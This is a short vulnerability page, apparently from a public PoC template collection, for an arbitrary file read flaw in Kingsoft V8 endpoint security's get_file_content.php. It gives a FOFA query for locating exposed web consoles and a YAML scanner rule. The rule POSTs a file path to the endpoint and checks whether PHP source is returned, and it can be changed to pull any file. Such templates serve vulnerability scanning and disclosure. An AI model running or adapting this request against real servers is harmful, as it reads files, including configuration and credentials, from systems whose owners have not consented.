kingsoft-v8-get-file-content-file-read: 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞

2025-08-01 金山V8终端安全系统 PoC Public

Description

金山 V8 终端安全系统 存在任意文件读取漏洞,攻击者可以通过漏洞下载服务器任意文件

fofa: title="在线安装-V8+终端安全系统Web控制台"

PoC

id: kingsoft-v8-get-file-content-file-read

info:
  name: 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞
  author: zan8in
  severity: high
  verified: false
  description: |-
    金山 V8 终端安全系统 存在任意文件读取漏洞,攻击者可以通过漏洞下载服务器任意文件
    fofa: title="在线安装-V8+终端安全系统Web控制台"
  tags: kingsoft,file-read
  created: 2023/10/13

rules:
  r0:
    request:
      method: POST
      path: /receive_file/get_file_content.php
      body: filepath=login.php
    expression: response.status == 200 && response.body.bcontains(b'<?php') && response.body.bcontains(b'"public/common.php"') && response.body.bcontains(b'HTTP_ACCEPT_LANGUAGE')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities